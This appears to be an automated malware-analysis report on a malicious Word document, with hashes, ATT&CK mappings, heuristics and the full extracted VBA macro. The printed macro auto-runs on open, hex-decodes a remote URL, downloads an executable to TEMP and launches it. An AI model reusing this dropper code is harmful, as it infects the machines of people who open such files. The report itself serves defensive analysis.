Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1f98eb75e208270f…

MALICIOUS

Office (OLE)

29.5 KB Created: 2015-01-08 17:48:00 Authoring application: Microsoft Office Word First seen: 2015-01-15
MD5: 94e5abd0bffe71c4e6b73a81c362fa5b SHA-1: 96294e46adbce3f62237246098a90187d9f6ee1d SHA-256: 1f98eb75e208270fe58e7a95dbab5facd61db611f0b0cbbc6ace61d183d2a64a
324 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample contains VBA macros that are obfuscated and designed to execute automatically upon opening. The macros utilize the URLDownloadToFile API, indicating an intent to download and execute a second-stage payload from a remote source. The presence of AutoOpen and Workbook_Open suggests a typical macro-based infection vector.

Heuristics 10

  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
        Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set iergerv = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set iergerv = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E"))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        irtwef = Environ(HexToString("54454D50")) & HexToString("5C424742756967627567554947372E657865")
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2656 bytes
SHA-256: dd5658f88c714f3b289b992c856492190c4b42f18b0162d4d473e75dc8f48a13
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
    Private Declare PtrSafe Function DeleteUrlCacheEntry Lib "wininet" Alias _
        "DeleteUrlCacheEntryA" (ByVal lpszUrlName As String) As Long

    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal pCaller As LongPtr, _
    ByVal szURL As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, _
    ByVal lpfnCB As LongPtr) As LongPtr
#Else
    Private Declare Function DeleteUrlCacheEntry Lib "wininet" Alias _
        "DeleteUrlCacheEntryA" (ByVal lpszUrlName As String) As Long

    Private Declare Function URLDownloadToFile Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal pCaller As Long, _
    ByVal szURL As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long
#End If
Public Function HexToString(ByVal hextext As String) As String
    
For y = 1 To Len(hextext)
    num = Mid(hextext, y, 2)
    Value = Value & Chr(Val("&h" & num))
    y = y + 1
Next y

HexToString = Value
End Function
Sub Gjvksdfsdf()

Dim lZQxseyO As Integer
lZQxseyO = 1
Do While lZQxseyO < 38
DoEvents: lZQxseyO = lZQxseyO + 1
Loop

UGivgHgfdg
End Sub
Sub AutoOpen()

Dim uLSlxfLf As Integer
uLSlxfLf = 8
Do While uLSlxfLf < 74
DoEvents: uLSlxfLf = uLSlxfLf + 1
Loop

    Gjvksdfsdf
End Sub
Sub Workbook_Open()

Dim pTXYsseR As Integer
pTXYsseR = 6
Do While pTXYsseR < 85
DoEvents: pTXYsseR = pTXYsseR + 1
Loop

    Gjvksdfsdf
End Sub
Sub UGivgHgfdg()

Dim kRbmYNKP As Integer
kRbmYNKP = 8
Do While kRbmYNKP < 67
DoEvents: kRbmYNKP = kRbmYNKP + 1
Loop

    fdgdfg = HexToString("687474703A2F2F5449434B4C4553544F4F54534945532E434F4D2F6A732F62696E2E657865")

Dim AEtCJJVU As Integer
AEtCJJVU = 3
Do While AEtCJJVU < 48
DoEvents: AEtCJJVU = AEtCJJVU + 1
Loop

    irtwef = Environ(HexToString("54454D50")) & HexToString("5C424742756967627567554947372E657865")

Dim VCMGYmnj As Integer
VCMGYmnj = 7
Do While VCMGYmnj < 31
DoEvents: VCMGYmnj = VCMGYmnj + 1
Loop

    dsfFfdg = URLDownloadToFile(0&, fdgdfg, irtwef, 0&, 0&)

Dim mjIUwCeN As Integer
mjIUwCeN = 1
Do While mjIUwCeN < 13
DoEvents: mjIUwCeN = mjIUwCeN + 1
Loop

    Set iergerv = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E"))
iergerv.Open irtwef
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.